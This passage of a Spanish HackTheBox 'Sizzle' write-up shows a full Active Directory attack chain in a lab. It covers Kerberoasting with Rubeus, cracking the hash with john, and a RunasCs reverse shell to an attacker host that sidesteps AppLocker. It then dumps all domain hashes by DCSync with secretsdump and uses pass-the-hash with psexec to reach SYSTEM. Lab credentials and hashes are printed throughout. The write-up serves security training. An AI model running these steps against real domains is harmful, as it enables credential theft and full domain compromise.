1*Evil-WinRM* PS C:\ProgramData> copy Rubeus.exe C:\Windows\Temp\Rubeus.exe
2*Evil-WinRM* PS C:\ProgramData> C:\Windows\Temp\Rubeus.exe
3
4 ______ _
5 (_____ \ | |
6 _____) )_ _| |__ _____ _ _ ___
7 | __ /| | | | _ \| ___ | | | |/___)
8 | | \ \| |_| | |_) ) ____| |_| |___ |
9 |_| |_|____/|____/|_____)____/(___/
10
11 v2.3.2
12
13
14 Ticket requests and renewals:
Kerberoasting mrlky
Ahora podemos solicitar el TGS y obtener el hash para intentar crackearlo.
1C:\Windows\Temp\Rubeus.exe kerberoast /outfile:C:\ProgramData\kerberoast.txt /creduser:htb.local\amanda /credpassword:Ashare1972
1*Evil-WinRM* PS C:\ProgramData> type kerberoast.txt
2$krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$27F69A08E2CED7E7A8F32DE6A91DF254$58C8528E6B6DEF76F6BA1F8EFC58768AA194285D21FFCD590E33DD69B679468F88DF7910A
3120FF20CEB9EFD6E9EA3A71D58AE972352F12F00D98A90D46AB1AC87DC32486F0C56921F26ADA30A782C54EFF3CC9AEB776EC640D7AEB70D73C6B5A1CD74462247B027B0BF42666CDA1CEE518A52F0
40400F49F71FEA35E19D00270D38549F422DF702912C17A1FA270357C61A2BB2982A74B5933B24DEBA1FF24AE5BFBA514AE47B50F585D71802F4A42F4E414CFB908417E4A76BBD37BCD06C12108E790
537DC2880362E070CE0A7076E00B908FB7E230A810C6EF6877EBE06DA385B879612A058F623929C7EBA5A36D4E2BCF36FD37CCC279C71C80F17856C55792F26A08E871D0FFE4D9CDAF0C05CCEA41CC9
607ACA0A9579BBE6AA5ED3B4210DC640602E515DBACD629A610E9FCA92AF9AD3473F056B644E404ACF2311B5D23785EE257C9287C6457F3787241810E4B9C61E15C2225D786B397FDDA082BF9068C7C
71D306220AB15F0A070F6DFA6315F2126C44020F5E5A09516C15D03CDF04C48DEFEB7BCE034F08A286445AFB4011825002BB4E5F4633E97380636CCC3D355C4A9148CE5619AD6DA0A2D4FDE16EA542E
8BE26E3EE0BD5305FEBF108B7C3971BEB15E020418A87D737DEA5ED138B897D1DFE24414DA7C11230268DB6EEF5BC5E09500B3721C6C4417E69DA2779B8C182E7BEE189840BB31BB3C3A67BA4BE4F61
9C7A09F0E68421B1631369942CA773F8A4B674A97442A2FF3161526E4448FF2FD119D9FED731D13FBFCE0BFED141C718E579CC40E76BF9B15208B4AD9D5B56A7297A874728B140FFF1E3B1A471772AF
10C58E8D40AE9559E4D72FCF8AF7C2F50AB5BFFE94C82BC16A78E248C61A428CD35E0D2151EAE094675E978704977830B1AD9BBEEF9959F8298C3F514AC260CA3B16F7726F22A29C05FED9061AD47157
11D997268DF15D24ACF63D80509D84F82387F25AFBEED96B0FA829497E2253A73D34BA3A01C1C1B51F8108C3B3F6C0271F0DC94F705D87DDDF1B3D381A8FEBCF16D5D05B32CDC06435FA9500FCDC9661
12333AC1286328B383E702494BE9AC3B151A1559CA6EAB96F4C5758F63AEF4AD47C1FC4C278327743B6D410C1BC702BC02C2B71F556C1CE677A0423FA4EF2AA1AA87F1C2139AC33227214A66D15FE975
1303235A5F4323817E9F4D713234615135D93213C7FFC8BF8EBFFF77955F2206A7F0ADF8AA010EA2A4AD92424D057F13638A830EC35C9789C7EC504D74E0E3DFBEA4288358BDCDBCE7531954339E038C
14DE4293D7033E8E33ADDD3A8A471762A09E823EB92BB0F5F225DE47DE09252110FA2D31A0A3067A1416D1CAFB15CCCEFAB3A8821872F8CD1A98DB365DE
Como no podemos utilizar la función downloadde evil-winrm podemos crear un pequeño servidor SMB para copiarnos este hash integro.
En nuestra máquina de atacante.
1$ sudo impacket-smbserver -smb2support smbFolder .
2Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra
3
4[*] Config file parsed
5[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
6[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
7[*] Config file parsed
8[*] Config file parsed
908/30/2024 05:33:17 PM: INFO: Config file parsed
En la máquina víctima.
1*Evil-WinRM* PS C:\ProgramData> copy kerberoast.txt \\10.10.14.66\smbFolder\hash.mrlky
Podemos comprobar los hashes MD5 para ver si coinciden.
1*Evil-WinRM* PS C:\ProgramData> Get-FileHash kerberoast.txt -Algorith MD5
2
3Algorithm Hash Path
4--------- ---- ----
5MD5 90B02519937FC40379F50B3ACC2BC382 C:\ProgramData\kerberoast.txt
1$ md5sum hash.mrlky
290b02519937fc40379f50b3acc2bc382 hash.mr
Y vemos que coinciden. Ahora podemos intentar crackearlo.
Y tenemos suerte al crackearlo. Parece la credencial para el usuario mrlky es Football#7
1$ john -w=/usr/share/wordlists/rockyou.txt hash.mrlky
2Using default input encoding: UTF-8
3Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
4Will run 4 OpenMP threads
5Press 'q' or Ctrl-C to abort, almost any other key for status
6Football#7 (?)
71g 0:00:00:06 DONE (2024-08-30 17:35) 0.1560g/s 1742Kp/s 1742Kc/s 1742KC/s Forever3!..Flubb3r
8Use the "--show" option to display all of the cracked passwords reliably
9Session completed.
Podemos comprobarla con netexec.
1$ nxc smb 10.129.208.237 -u mrlky -p 'Football#7'
2SMB 10.129.208.237 445 SIZZLE [*] Windows 10 / Server 2016 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
3SMB 10.129.208.237 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
Shell as mrlky
Podemos conseguir una shell como este usuario con RunasCs.exe aunque no haría falta ya que podemos hacer el DCSync directamente sin necesidad de conseguir una consola como este usuario.
Pero vamos a conseguir la consola como este usuario ya que supongo que la flag de usuario estará en su directorio de trabajo.
Nos pasamos el RunasCs.exe a la máquina víctima.
1$ cp /opt/RunasCs.exe .
2┌─[192.168.1.52]─[pointedsec@parrot]─[~/Desktop/sizzle/content]
3└──╼ [★]$ sudo impacket-smbserver -smb2support smbFolder .
4Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra
5
6[*] Config file parsed
7[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
8[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
9[*] Config file parsed
10[*] Config file parsed
1108/30/2024 05:38:12 PM: INFO: Config file parsed
1*Evil-WinRM* PS C:\ProgramData> copy \\10.10.14.66\smbFolder\RunasCs.exe .
Nos copiamos el binario a la ruta C:\Windows\Temp para saltarnos el AppLocker.
1*Evil-WinRM* PS C:\ProgramData> copy RunasCs.exe C:\Windows\Temp\.
Nos ponemos en escucha con netcat por el puerto 443.
1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...
Y ahora con RunasCs.exe nos mandamos una powershell a ese puerto.
1*Evil-WinRM* PS C:\ProgramData> C:\Windows\Temp\RunasCs.exe mrlky Football#7 powershell.exe -r 10.10.14.66:443
2[*] Warning: The logon for user 'mrlky' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
3
4[+] Running in session 0 with process function CreateProcessWithLogonW()
5[+] Using Station\Desktop: Service-0x0-73f52b$\Default
6[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 3248 created in background.
Y así migramos al usuario mrlky
1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...
3connect to [10.10.14.66] from (UNKNOWN) [10.129.208.237] 56801
4Windows PowerShell
5Copyright (C) 2016 Microsoft Corporation. All rights reserved.
6
7PS C:\Windows\system32> whoami
8whoami
9htb\mrlky
Y podemos ver la flag de usuario.
1PS C:\Users\mrlky\Desktop> type user.txt
2type user.txt
3c133d9f6cf5128c3...
Privilege Escalation
DCSync
Ahora que ya hemos conseguido la flag del usuario “como dios manda” solo falta hacer el DCSync para escalar privilegios.
Para ellos simplemente desde nuestra máquina de atacante podemos utilizar secretsdump.py para hacer el DCSync y conseguir el hash NT del usuario Administrator.
1$ secretsdump.py 'htb.local'/'mrlky':'Football#7'@'sizzle.htb.local'
2Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra
3
4[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
5[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
6[*] Using the DRSUAPI method to get NTDS.DIT secrets
7Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
8Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
9krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
10DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
11amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
12mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
13sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
14SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:5efc17c923d5d12471103d1b8cea7fb6:::
15[*] Kerberos keys grabbed
16Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
17Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
18Administrator:des-cbc-md5:ad7afb706715e964
19krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
20krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
21krbtgt:des-cbc-md5:866db35eb9ec5173
22amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
23amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
24amanda:des-cbc-md5:70ba677a4c1a2adf
25mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
26mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
27mrlky:des-cbc-md5:02f1a4da0432f7f7
28sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
29sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
30sizzler:des-cbc-md5:5d51d30e68d092d9
31SIZZLE$:aes256-cts-hmac-sha1-96:56fe88e6f5b78119b31cc1d5dfb05e51dfaf4b58f2c29fc7cec907dea8928401
32SIZZLE$:aes128-cts-hmac-sha1-96:d0cbdcac816dd60049e60421152e1ab7
33SIZZLE$:des-cbc-md5:f273ba5829fb2c51
34[*] Cleaning up...
Vemos que el hash NT para Administrator es f6b7160bfc91823792e0ac3a162c9267
Y ya podemos hacer Pass-The-Hash con psexec.py para conseguir una consola con máximos privilegios.
1$ psexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 Administrator@htb.local
2Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra
3
4[*] Requesting shares on htb.local.....
5[*] Found writable share ADMIN$
6[*] Uploading file dOoqWXDz.exe
7[*] Opening SVCManager on htb.local.....
8[*] Creating service KKAU on htb.local.....
9[*] Starting service KKAU.....
10[!] Press help for extra shell commands
11Microsoft Windows [Version 10.0.14393]
12(c) 2016 Microsoft Corporation. All rights reserved.
13
14C:\Windows\system32> whoami
15nt authority\system
Podemos ver la flag de root
1C:\Users\administrator\Desktop> type root.txt
22d8ce7abd90030df0...
¡Y ya estaría!
Happy Hacking! 🚀
#HackTheBox #Sizzle #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #Privilege Escalation #RCE #Exploit #Windows #SMB Enumeration #CIFS Mounting #NTLM Stealing #Abusing SCF #Hash Cracking #Cracking #Bloodhound Enumeration #Certificates #Private Key #WinRM #Bypassing AppLocker #Kerberoasting #Lateral Movement #RunasCs.exe #User Pivoting #DCSync #Pass the Hash